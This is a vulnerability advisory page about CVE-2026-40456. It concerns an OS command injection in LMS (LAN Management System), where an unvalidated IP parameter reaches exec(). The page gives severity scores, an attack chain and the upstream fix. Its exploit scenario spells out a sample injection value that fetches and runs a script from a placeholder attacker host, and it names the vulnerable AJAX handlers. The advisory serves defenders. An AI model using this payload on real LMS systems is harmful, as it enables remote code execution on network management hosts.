Skip to main content

LMS CVE-2026-40456

| EUVDEUVD-2026-37875 HIGH
OS Command Injection (CWE-78)
2026-06-18 CERT-PL GHSA-765c-7qf8-cw9w
8.6
CVSS 4.0 · Vendor: CERT-PL
Share

Severity by source

Vendor (CERT-PL) PRIMARY
8.6 HIGH
CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.0 HIGH

Adjacent management network access plus an authenticated low-privileged LMS operator account are required; once reached, exec() injection yields full host compromise with no user interaction.

3.1 AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N

Primary rating from Vendor (CERT-PL).

CVSS VectorVendor: CERT-PL

CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 12:31 vuln.today
Analysis Generated
Jun 18, 2026 - 12:31 vuln.today

DescriptionCVE.org

An OS Command Injection vulnerability exists in LMS (LAN Management System) before commit 9fcb4de due to an IP address parameter being passed to the "exec()" function without proper validation, allowing attackers to execute arbitrary operating system commands.

AnalysisAI

OS command injection in LMS (LAN Management System) before commit 9fcb4de allows authenticated adjacent attackers to execute arbitrary operating system commands by supplying a malicious IP address parameter that is passed unsanitized to exec(). The flaw was reported by CERT-PL and an upstream fix is available; no public exploit identified at time of analysis, and the CVSS 4.0 score of 8.6 reflects high impact on the vulnerable system with limited subsequent-system effect.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to LMS as operator
Delivery
Reach netdev/node AJAX endpoint on adjacent network
Exploit
Submit IP field with shell metacharacters
Execution
exec() runs injected command
Persist
Code execution as web server user
Impact
Pivot into ISP management infrastructure

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated LMS operator session (CVSS PR:L) with permission to invoke the netdevxajax getFirstFreeAddress or nodexajax updateNodeLock handlers, and network reachability to the LMS web interface from the same adjacent/management network (CVSS AV:A) - typical internet exposure of LMS is uncommon. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N indicates an adjacent-network attacker with low privileges (an authenticated LMS operator account) can fully compromise the host running LMS without user interaction, which matches the source-code evidence that the vulnerable handlers are AJAX endpoints reachable only from authenticated UI sessions. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a low-privileged LMS operator account on the management network opens the network-device or node management UI and submits a crafted IP-address field (for example '127.0.0.1; curl attacker/x|sh') to the getFirstFreeAddress or updateNodeLock AJAX endpoint. Because the $ip parameter is concatenated into a shell command and passed to exec() without validation, the injected commands run as the web server user, yielding arbitrary code execution on the LMS host. …
Remediation Upstream fix available (commit 9fcb4de); released patched version not independently confirmed - apply the upstream patch https://github.com/chilek/lms/commit/9fcb4de19b7d76394898dbc124252b86b07ac0ed or upgrade to any LMS build that includes it, which adds check_ip($ip) validation to getFirstFreeAddress() and updateNodeLock(). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all LMS deployments and identify which versions are affected (prior to commit 9fcb4de). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-40456 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy